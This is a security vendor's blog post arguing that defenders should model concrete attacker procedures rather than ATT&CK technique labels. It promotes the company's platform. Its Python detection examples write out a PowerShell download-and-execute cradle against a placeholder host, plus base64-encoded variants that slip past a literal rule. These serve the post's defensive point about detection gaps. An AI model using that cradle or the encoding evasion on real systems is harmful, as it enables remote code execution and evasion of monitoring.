Tidal Cyber Blog

What Procedures Actually Represent and Why They Are Critical to Your Defensive Strategy

Written by Tidal Cyber | May 6, 2026 2:30:00 PM

Most security teams can map an attack to a technique in seconds. Very few can explain exactly how that attack would be executed in their environment.

That gap is not theoretical. It is where most detection failures occur.

Techniques, as defined in frameworks like MITRE ATT&CK, describe categories of adversary behavior. They tell you what an attacker is doing at a high level. They do not capture how an attacker operates and executes an attack in a real system, under real constraints, with real variations.

This is where abstraction breaks down. A technique can represent dozens of execution paths, each with different commands, dependencies, and outcomes. Detection built at that level assumes consistency that does not exist in practice.

As a result, teams operate with visibility into categories of activity, but not into actual sequences that determine whether an attack succeeds or fails. Coverage looks complete on paper. In execution, it is uneven and unreliable.

The missing layer is procedures: the exact steps an attacker takes to move from access to impact. Without that layer, defenders are not validating their defenses against how attacks actually run. They are validating against how attacks are described.

 

What Procedures Actually Represent

Procedures capture how an adversary actually executes an attack: the concrete steps taken to carry it out.

They are not labels or categories. They are the exact sequence of actions an attacker performs to achieve an objective within a specific environment.

At this level, an attack is no longer abstract. It is concrete and constrained.
It includes the commands used, how they are structured, where they run, and what they depend on to succeed.

A procedure answers questions that techniques cannot:

  • What command was executed, and with which arguments?
  • What user or process context is required?
  • What had to exist beforehand for the action to work?
  • What happened immediately before and after execution?

This is where detection either works or fails.

A technique like “Command and Scripting Interpreter” can represent anything from a simple script execution to a chained sequence of encoded commands, environment checks, and privilege escalation steps. At the technique level, these all look the same. At the procedure level, they behave completely differently.

That difference matters.

Detection logic operates on specific patterns, command lines, process relationships, and execution context. If those patterns are derived from abstraction, they assume consistency across executions. In reality, attackers vary commands, adjust parameters, and change execution flow to bypass static detection.
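A minimal sketch of that failure mode, using a hypothetical rule and hypothetical command lines: a detection written against one literal pattern fires on the plain form of a behavior but is blind to a base64-encoded variant of the same behavior.

```python
import base64
import re

# A naive detection: flag PowerShell download cradles by matching the
# literal string "DownloadString" anywhere in the command line.
RULE = re.compile(r"DownloadString", re.IGNORECASE)

def detect(command_line: str) -> bool:
    return bool(RULE.search(command_line))

# Variant 1: the plain form the rule was written against.
plain = "powershell.exe -c IEX (New-Object Net.WebClient).DownloadString('http://x/a.ps1')"

# Variant 2: the same behavior, base64-encoded (PowerShell's -EncodedCommand
# takes UTF-16LE base64), so the literal pattern never appears in the arguments.
payload = "IEX (New-Object Net.WebClient).DownloadString('http://x/a.ps1')"
encoded = ("powershell.exe -EncodedCommand "
           + base64.b64encode(payload.encode("utf-16-le")).decode())

print(detect(plain))    # True  - the rule fires
print(detect(encoded))  # False - same behavior, the rule is blind
```

At the technique level both command lines are the same thing; at the procedure level they are two execution paths, only one of which this rule covers.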

Procedures capture that variation. They show how an attacker adapts in practice, not how that behavior is categorized.

Without procedures, defenders are not working with real attack execution. They are working with simplified representations of behavior that remove the details most likely to cause detection failure.

 

Why Abstraction Fails

Abstraction was introduced to make ATT&CK data usable at scale. It organizes behavior into clean, consistent categories. That works for communication and reporting. It breaks down at execution.

A single technique in MITRE ATT&CK can represent dozens of real-world procedures. Each of those procedures can differ in command structure, encoding, parent-child process relationships, privilege context, and sequencing. Detection does not operate on the technique label. It operates on those details.

When defenses are built at the technique level, they assume that these variations behave similarly enough to be detected by the same logic. That assumption does not hold.

Attackers do not execute techniques. They execute commands. They chain actions. They adjust parameters based on what is available in the environment. Small changes, like encoding a payload, switching interpreters, or modifying execution flow, can bypass detections that appear correct at the abstract level.

This is where the gap emerges.

Coverage models report that a technique is “monitored” or “detected.” In reality, only a subset of possible executions for that technique are covered. The rest falls into the gaps between variations.
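A toy illustration of that reporting gap, with hypothetical data: technique-level reporting reads as "detected" as soon as anything fires, while procedure-level reporting shows how many real execution paths are actually covered.

```python
# Hypothetical data: one technique, several known procedure variants,
# and whether the current rule set detects each one.
procedures = {
    "plain interpreter call": True,
    "encoded command": False,
    "alternate interpreter": False,
    "indirect execution via system binary": False,
}

# Technique-level reporting: "detected" if any variant fires.
technique_covered = any(procedures.values())

# Procedure-level reporting: the fraction of execution paths covered.
procedure_coverage = sum(procedures.values()) / len(procedures)

print(technique_covered)            # True -> dashboard marks the technique covered
print(f"{procedure_coverage:.0%}")  # 25%  -> most execution paths are missed
```

The same rule set produces both numbers; only the level of measurement changes.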

The problem is not visibility. It is precision.

Abstraction removes the details that determine whether detection succeeds. As a result, teams can have high coverage on paper while missing the exact execution paths attackers use in practice.

 

Why Procedures Are Hard to Work With

Procedures are not delivered in a clean format.

They are buried in unstructured sources such as incident reports, threat research blogs, reverse engineering notes, and partial disclosures. Each source captures only a fragment of the full execution. Commands may be shown without context. Context may be described without exact commands. Critical steps are often implied, not documented.

Reconstructing a full procedure requires stitching these fragments together.

That process is manual and time-consuming. It requires interpreting intent, filling gaps, and validating assumptions against how systems actually behave. Even then, the result is not static. Attackers modify execution constantly by changing tools, adjusting parameters, or reordering steps to evade detection.

This creates two problems.

First, procedures are difficult to standardize. Unlike techniques, they do not fit neatly into predefined categories. Each procedure is tied to a specific execution path, which may not generalize cleanly across environments.

Second, procedures do not scale easily. Maintaining an accurate, up-to-date set of procedures requires continuous extraction, validation, and refinement. Most teams do not have the time or resources to do this consistently.

This is why many vendors stop at abstraction. Techniques are structured, stable, and easy to map. Procedures are dynamic, fragmented, and expensive to maintain.

But those same characteristics are what make procedures operationally valuable. They reflect how attacks actually run, not how they are summarized.

 

What Defenders Are Missing

When procedures are not part of the model, defenders are forced to operate on assumptions.

Detection logic is built from generalized patterns rather than verified execution paths. Rules are written to match a technique, not the way that technique is actually used in an attack. This creates coverage that looks complete but is shallow in practice.

The gaps are not obvious.

A detection may trigger a known command pattern but fail when that same command is slightly modified, encoded, or executed under a different parent process. Another detection may rely on a specific sequence of events that does not match how the attack actually unfolds in a real environment. These failures are not visible at the technique level because the abstraction hides variation.

As a result, teams cannot reliably answer a basic question: Can we defend against this adversary procedure as the attack is actually executed?

Instead, they validate against simplified representations. Testing is performed against expected behavior, not realistic behavior. This leads to detections that pass validation but fail under adversarial conditions.

The outcome is consistent.

Coverage appears strong in dashboards.
Detection performance is inconsistent in practice.

Without procedures, defenders lack the layer that connects intelligence to execution. They can see categories of attack activity, but they cannot evaluate whether their controls will hold when those attacks are carried out with real-world variation.

 

The Shift to Procedure-Led Intelligence

Closing the gap requires moving from abstract mapping to execution-level understanding.

Procedure-led intelligence focuses on how attacks actually run. It captures the full execution chain (commands, context, dependencies, and sequencing) and makes that data usable for detection and validation.

This changes how defenses are built.

Instead of writing detections against a technique label, teams build against verified execution paths. Instead of assuming how an attack behaves, they test against how it has actually been observed to behave. Variation is no longer an edge case. It becomes part of the model.
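A sketch of what that looks like in practice, with a hypothetical rule and hypothetical observed variants: each verified execution path becomes a test case, so a detection that only matches one form fails explicitly, and visibly, on the others.

```python
def detect(command_line: str) -> bool:
    # Stand-in for a real detection rule; it only matches one literal form.
    return "-EncodedCommand" in command_line

# Verified execution paths observed for the same behavior (hypothetical;
# PowerShell accepts abbreviated parameter names like -enc and -e).
observed_variants = [
    "powershell.exe -EncodedCommand SQBFAFgA...",
    "powershell.exe -enc SQBFAFgA...",
    "pwsh -e SQBFAFgA...",
]

# Variation is part of the model: every observed path is a test case.
for variant in observed_variants:
    status = "detected" if detect(variant) else "MISSED"
    print(f"{status}: {variant}")
# prints "detected" for the first variant and "MISSED" for the other two
```

The failure is no longer inferred from a coverage map; it is a specific command line the rule did not match.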

This approach also changes how gaps are identified.

At the technique level, gaps are inferred. At the procedure level, they are observable. If a specific execution path is not detected, the failure is explicit. Teams can see exactly where detection breaks: a missing command pattern, an untracked process relationship, or a blind spot in execution context.

The result is not more data. It is more precise data.

Procedure-led intelligence connects threat intelligence directly to detection logic. It removes the need to guess how an attack might execute and replaces it with evidence of how it does execute.

 

Why Tidal Cyber and Threat-Led Defense

Most platforms organize intelligence around what is easy to structure. Techniques are predefined, stable, and align cleanly with frameworks like MITRE ATT&CK. That makes them easy to map, visualize, and report. It does not make them operationally complete.

The Tidal Cyber Threat-Led Defense platform operationalizes intelligence at the procedure level. The focus is not on mapping intelligence into categories; it is on aligning defenses against how attackers actually execute. This means extracting procedures from unstructured sources like incident reports, threat research, and fragmented disclosures, converting them into structured, usable execution models, and capturing those models in a knowledge base.

That process requires more than aggregation. It involves identifying command patterns, resolving missing context, linking dependent steps, and validating how those steps interact in a real environment. The output is not a label. It is a sequence.

Tidal Cyber does exactly this through NARC, the proprietary AI engine behind Threat-Led Defense.

Where abstraction simplifies behavior into a category, procedure-led modeling preserves the execution specifics that determine whether your defenses succeed or fail. As a result, procedure-led intelligence becomes directly usable for detection engineering and validation readiness. Teams are no longer working from possibility. They are working from reality.